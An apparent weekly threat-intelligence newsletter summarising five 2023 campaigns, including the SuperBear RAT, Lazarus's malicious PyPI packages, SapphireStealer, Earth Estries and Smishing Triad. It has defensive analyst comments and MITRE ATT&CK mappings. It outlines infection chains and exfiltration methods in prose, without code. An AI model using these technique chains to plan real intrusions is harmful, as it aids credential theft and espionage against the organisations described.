<div id="weekly"> <p id="intro"> <p>The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics:<b> APT, Backdoors, China, North Korea, Remote access trojans, Smishing, Spearphishing, </b>and <b>Typosquatting</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. <img alt="ACW IOCs Summary Charts" src="https://cdn.filestackcontent.com/EPdr8NGQpG4I9C583qGA"/> <b>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b> </p> <div class="trending-threats-article" id="trending-threats"> <h2 id="trendingthreats">Trending Cyber News and Threat Intelligence</h2> <h3 id="article-1"><a href="https://interlab.or.kr/archives/19416" target="_blank">Novel RAT Discovered “SuperBear” Targeting Journalist Covering Geopolitics of Asia</a></h3> <p>(published: September 1, 2023)</p> <p> A new remote access trojan (RAT) dubbed SuperBear has been discovered by Interlab researchers. This incident was attributed with low confidence to the North Korea-sponsored Kimsuky group. It is likely targeting journalists and civil society groups in South Korea, or broader. The initial compromise was made through a malicious .LNK document sent to a journalist via email, impersonating a member of an activist organization. Upon execution, the document loaded a PowerShell command, which then executed a Visual Basic script. This script fetched payloads from a compromised WordPress website, including a binary and an AutoIt script. The script performed process injection using a process hollowing technique, injecting malicious code into a suspended process. The SuperBear RAT connects to a C2 server and performs various attack operations including exfiltrating process and system data, downloading and executing a shell command, and downloading and running a DLL. <br/> <b>Analyst Comment:</b> Spearphishing emails and activist impersonation remains a popular tactic among state-sponsored groups. Journalists should evaluate the risk and abstain from opening risky attachments such as LNK files. All known indicators associated with the SuperBear sample are available in the Anomali platform and customers are advised to block these on their infrastructure. This incident and other Advisory, News and Blog sources were made available in Anomali ThreatStream as RSS feeds, and for AutoLens+ subscribers these are also tagged and summarized.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10001" target="_blank">[MITRE ATT&amp;CK] T1566.001 - Phishing: Spearphishing Attachment</a> | <a href="https://ui.threatstream.com/attackpattern/9920" target="_blank">[MITRE ATT&amp;CK] T1055.012 - Process Injection: Process Hollowing</a> | <a href="https://ui.threatstream.com/attackpattern/22938" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Obfuscated Files or Information [T1027]</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/3712" target="_blank">[MITRE ATT&amp;CK] T1059.001: PowerShell</a> | <a href="https://ui.threatstream.com/attackpattern/9853" target="_blank">[MITRE ATT&amp;CK] T1059.005 - Command and Scripting Interpreter: Visual Basic</a> | <a href="https://ui.threatstream.com/attackpattern/10048" target="_blank">[MITRE ATT&amp;CK] T1584 - Compromise Infrastructure</a> | <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a><br/> <b>Tags:</b> malware:SuperBear, malware-type:RAT, target-country:KR, source-country:KP, target-industry:Media, target-industry:Information, technique:PowerShell, technique:Process hollowing, language:AutoIT, language:VBS, file-type:AU3, file-type:EXE, file-type:LNK, file-type:PDB, target-system:Windows </p> <h3 id="article-1"><a href="https://www.reversinglabs.com/blog/vmconnect-supply-chain-campaign-continues" target="_blank">VMConnect Supply Chain Attack Continues, Evidence Points to North Korea</a></h3> <p>(published: August 31, 2023)</p> <p> North Korea-sponsored Lazarus Group has been identified as the actor behind a malicious campaign targeting the Python Package Index (PyPI) repository. ReversingLabs dubbed this campaign VMConnect because Lazarus has been uploading malicious packages impersonating popular software projects, including a VMware vSphere connector module named vConnector. These packages were downloaded hundreds of times before being removed. They contained a file that triggered data collection from the infected machine, with the information being sent to the attackers' command and control servers. Lazarus has been employing various detection evasion techniques including encryption, endless loops, obfuscation, and executing the malicious payloads only after they had been imported to and called on by legitimate applications.<br/> <b>Analyst Comment:</b> Developers should receive appropriate training as to not fall for typosquatting and other impersonation attacks. Organizations should ensure that any open-source or proprietary code is evaluated for the presence of suspicious or malicious indicators, including hidden (obfuscated) functionality, and unexplained communications with third-party infrastructure. All known network indicators associated with the VMConnect campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/22938" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Obfuscated Files or Information [T1027]</a> | <a href="https://ui.threatstream.com/attackpattern/10000" target="_blank">[MITRE ATT&amp;CK] T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion</a> | <a href="https://ui.threatstream.com/attackpattern/22186" target="_blank">[MITRE ATT&amp;CK] Defense Evasion - Deobfuscate/Decode Files or Information [T1140]</a> | <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a> | <a href="https://ui.threatstream.com/attackpattern/9715" target="_blank">[MITRE ATT&amp;CK] T1071.001 - Application Layer Protocol: Web Protocols</a><br/> <b>Tags:</b> actor:Lazarus Group, actor:DangerousPassword, actor:Labyrinth Chollima, source-country:KP, technique:Package typosquatting, campaign:VMConnect, threat-type:Software supply chain, abused:PyPI, abused:Base64, abused:XOR </p> <h3 id="article-1"><a href="https://blog.talosintelligence.com/sapphirestealer-goes-open-source/" target="_blank">SapphireStealer: Open-Source Information Stealer Enables Credential and Data Theft</a></h3> <p>(published: August 31, 2023)</p> <p> SapphireStealer, an open-source information stealer malware, has been identified as a growing threat since its release on GitHub in December 2022. In January 2023, the 0day2 account behind the initial SapphireStealer release posted another .NET malware called FUD-Loader that some of the users of SapphireStealer included in their infostealer delivery chain. SapphireStealer gathers host information, takes screenshots, harvests cached browser credentials, and collects files with predefined extensions. The stolen data is then compressed and sent to the attacker via SMTP. SapphireStealer has seen notable modifications by different threat actors, including the use of the Discord webhook API and Telegram posting API for data exfiltration.<br/> <b>Analyst Comment:</b> Readily-available and open-source malware is dangerous as it lowers the barrier to entry, enables fast evolution and variety of infection chains. All known indicators associated with recent SapphireStealer campaigns are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10025" target="_blank">[MITRE ATT&amp;CK] T1555.003 - Credentials from Password Stores: Credentials From Web Browsers</a> | <a href="https://ui.threatstream.com/attackpattern/13021" target="_blank">[MITRE ATT&amp;CK] Picus: The System Information Discovery Technique Explained - MITRE ATT&amp;CK T1082</a> | <a href="https://ui.threatstream.com/attackpattern/9671" target="_blank">[MITRE ATT&amp;CK] T1113 - Screen Capture</a> | <a href="https://ui.threatstream.com/attackpattern/3708" target="_blank">[MITRE ATT&amp;CK] T1005: Data from Local System</a> | <a href="https://ui.threatstream.com/attackpattern/9710" target="_blank">[MITRE ATT&amp;CK] T1057 - Process Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9950" target="_blank">[MITRE ATT&amp;CK] T1489 - Service Stop</a> | <a href="https://ui.threatstream.com/attackpattern/9693" target="_blank">[MITRE ATT&amp;CK] T1560.001 - Archive Collected Data: Archive Via Utility</a> | <a href="https://ui.threatstream.com/attackpattern/9742" target="_blank">[MITRE ATT&amp;CK] T1048 - Exfiltration Over Alternative Protocol</a> | <a href="https://ui.threatstream.com/attackpattern/9983" target="_blank">[MITRE ATT&amp;CK] T1016 - System Network Configuration Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9770" target="_blank">[MITRE ATT&amp;CK] T1070.004 - Indicator Removal on Host: File Deletion</a> | <a href="https://ui.threatstream.com/attackpattern/23207" target="_blank">[MITRE ATT&amp;CK] Command and Control - Remote File Copy [T1105]</a> | <a href="https://ui.threatstream.com/attackpattern/9746" target="_blank">[MITRE ATT&amp;CK] T1567 - Exfiltration Over Web Service</a><br/> <b>Tags:</b> malware:SapphireStealer, malware-type:Infostealer, threat-type:Open-source, malware:FUD-Loader, malware-type:Downloader, actor:0day2, actor:romanmaslov200, abused:Discord webhook API, abused:Telegram posting API, language:.NET, file-type:EXE, target-system:Windows </p> <h3 id="article-1"><a href="https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html" target="_blank">Earth Estries Targets Government, Tech for Cyberespionage</a></h3> <p>(published: August 30, 2023)</p> <p> Trend Micro researchers have uncovered activity by a cyberespionage group dubbed Earth Estries that has been operating since at least 2020. The group targets government and tech organizations in various countries (Germany, Malaysia, the Philippines, South Africa, Taiwan, and the US), using advanced tactics such as PowerShell downgrade attacks and compromising accounts with administrative privileges. They use tools like Cobalt Strike, Meterpreter, and PlugX to infiltrate networks while focusing on the theft of PDF and DDF files. The group's toolkit includes a range of tools, including the heavily-obfuscated HTTP backdoor Zingdoor, an information stealer called TrillClient, and HemiGate, another backdoor executed via DLL sideloading. The group uses various domains for its command-and-control (C2) infrastructure and often hides behind content delivery networks (CDNs) to obscure its IP addresses.<br/> <b>Analyst Comment:</b> Earth Estries heavily relies on DLL sideloading attacks against older versions of legitimate files, which makes it even more important to implement version controls and application baselines. All known indicators associated with this campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/9700" target="_blank">[MITRE ATT&amp;CK] T1087 - Account Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9873" target="_blank">[MITRE ATT&amp;CK] T1482 - Domain Trust Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/23579" target="_blank">[MITRE ATT&amp;CK] Picus: T1047 Windows Management Instrumentation of the MITRE ATT&amp;CK Framework</a> | <a href="https://ui.threatstream.com/attackpattern/3712" target="_blank">[MITRE ATT&amp;CK] T1059.001: PowerShell</a> | <a href="https://ui.threatstream.com/attackpattern/3718" target="_blank">[MITRE ATT&amp;CK] T1569.002: Service Execution</a> | <a href="https://ui.threatstream.com/attackpattern/9647" target="_blank">[MITRE ATT&amp;CK] T1021.002 - Remote Services: Smb/Windows Admin Shares</a> | <a href="https://ui.threatstream.com/attackpattern/10104" target="_blank">[MITRE ATT&amp;CK] T1574.002 - Hijack Execution Flow: Dll Side-Loading</a> | <a href="https://ui.threatstream.com/attackpattern/9592" target="_blank">[MITRE ATT&amp;CK] T1027.002 - Obfuscated Files or Information: Software Packing</a> | <a href="https://ui.threatstream.com/attackpattern/10101" target="_blank">[MITRE ATT&amp;CK] T1036.004 - Masquerading: Masquerade Task Or Service</a> | <a href="https://ui.threatstream.com/attackpattern/10081" target="_blank">[MITRE ATT&amp;CK] T1036.005 - Masquerading: Match Legitimate Name Or Location</a> | <a href="https://ui.threatstream.com/attackpattern/9767" target="_blank">[MITRE ATT&amp;CK] T1070 - Indicator Removal On Host</a> | <a href="https://ui.threatstream.com/attackpattern/12872" target="_blank">[MITRE ATT&amp;CK] T1562.010 - Impair Defenses: Downgrade Attack</a> | <a href="https://ui.threatstream.com/attackpattern/9719" target="_blank">[MITRE ATT&amp;CK] T1134.001 - Access Token Manipulation: Token Impersonation/Theft</a> | <a href="https://ui.threatstream.com/attackpattern/9931" target="_blank">[MITRE ATT&amp;CK] T1053.005 - Scheduled Task/Job: Scheduled Task</a> | <a href="https://ui.threatstream.com/attackpattern/9933" target="_blank">[MITRE ATT&amp;CK] T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</a> | <a href="https://ui.threatstream.com/attackpattern/9860" target="_blank">[MITRE ATT&amp;CK] T1543.003 - Create or Modify System Process: Windows Service</a> | <a href="https://ui.threatstream.com/attackpattern/10104" target="_blank">[MITRE ATT&amp;CK] T1574.002 - Hijack Execution Flow: Dll Side-Loading</a> | <a href="https://ui.threatstream.com/attackpattern/9870" target="_blank">[MITRE ATT&amp;CK] T1078 - Valid Accounts</a> | <a href="https://ui.threatstream.com/attackpattern/9693" target="_blank">[MITRE ATT&amp;CK] T1560.001 - Archive Collected Data: Archive Via Utility</a> | <a href="https://ui.threatstream.com/attackpattern/9888" target="_blank">[MITRE ATT&amp;CK] T1056.001 - Input Capture: Keylogging</a> | <a href="https://ui.threatstream.com/attackpattern/9671" target="_blank">[MITRE ATT&amp;CK] T1113 - Screen Capture</a> | <a href="https://ui.threatstream.com/attackpattern/9715" target="_blank">[MITRE ATT&amp;CK] T1071.001 - Application Layer Protocol: Web Protocols</a> | <a href="https://ui.threatstream.com/attackpattern/9891" target="_blank">[MITRE ATT&amp;CK] T1071.004 - Application Layer Protocol: Dns</a> | <a href="https://ui.threatstream.com/attackpattern/9748" target="_blank">[MITRE ATT&amp;CK] T1567.002 - Exfiltration Over Web Service: Exfiltration To Cloud Storage</a><br/> <b>Tags:</b> actor:Earth Estries, actor:FamousSparrow, malware:Cobalt Strike, detection:Trojan.Win64.COBEACON, malware:PlugX, malware:Meterpreter, malware:Zingdoor, detection:Backdoor.Win32.ZINGDOOR, detection:Backdoor.Win64.ZINGDOOR, malware:HemiGate, malware-type:Backdoor, detection:Backdoor.Win32.HEMIGATE, detection:Trojan.Win64.DRACULOADER, malware:TrillClient, malware-type:Infostealer, detection:Trojan.Win64.TRILLCLIENT, detection:Trojan.Win32.TRILLINSTALLER, target-industry:Government, target-industry:Tech, Cyberespionage, technique:PowerShell downgrade, technique:AMSI bypass, abused:Github, abused:Gmail, abused:AnonFiles, abused:Fastly CDN, abused:File-io, target-country:PH, target-country:TW, target-country:MY, target-country:ZA, target-country:DE, target-country:US, language:Golang, cs-watermark:2029527128, file-type:CAB, file-type:DLL, file-type:EXE, target-system:Windows </p> <h3 id="article-1"><a href="https://www.resecurity.com/blog/article/smishing-triad-targeted-usps-and-us-citizens-for-data-theft" target="_blank">"Smishing Triad" Targeted USPS and US Citizens for Data Theft</a></h3> <p>(published: August 30, 2023)</p> <p> A China-based cyber-criminal group dubbed Smishing Triad has been conducting large-scale smishing campaigns targeting Indonesia, Italy, Japan, Poland, Sweden, UK, US, and other countries. The group mostly impersonates various postal and delivery services and uses iMessages from compromised Apple iCloud accounts to send package-tracking text scams, aiming to collect personally identifying information and payment credentials. Their latest campaign analyzed by Resecurity researchers was targeting US citizens with USPS-themed messages. Other Smishing Triad activities include attacking online-shopping platforms via malicious code injections that intercept customer data, and selling smishing kits via Telegram groups. Researchers have identified a cluster of Vietnamese-speaking actors as affiliates of the Smishing Triad fraud-as-a-service network. Resecurity has identified over 108,044 records of victims’ compromised data.<br/> <b>Analyst Comment:</b> Users should avoid clicking unsolicited tracking links. Regularly check your banking statements for suspicious transactions. Users receiving smishing messages may consider reporting them to appropriate authorities: make a screenshot or copy the body of the suspicious message without clicking on the web link. All known network indicators associated with this campaign are available in the Anomali platform and customers are advised to block these on their infrastructure.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10041" target="_blank">[MITRE ATT&amp;CK] T1583.001 - Acquire Infrastructure: Domains</a> | <a href="https://ui.threatstream.com/attackpattern/10041" target="_blank">[MITRE ATT&amp;CK] T1583.001 - Acquire Infrastructure: Domains</a> | <a href="https://ui.threatstream.com/attackpattern/10048" target="_blank">[MITRE ATT&amp;CK] T1584 - Compromise Infrastructure</a> | <a href="https://ui.threatstream.com/attackpattern/10028" target="_blank">[MITRE ATT&amp;CK] T1566.002 - Phishing: Spearphishing Link</a><br/> <b>Tags:</b> actor:Smishing Triad, actor:wangduoyu8, actor:dy_tongbu, target-organization:USPS, target-country:US, source-country:CN, source-country:VN, threat-type:Data Theft, technique:Smishing, technique:SQL injection, abused:iMessages, target-system:Apple iCloud, threat-type:Fraud-as-a-service </p> </div> </p></div>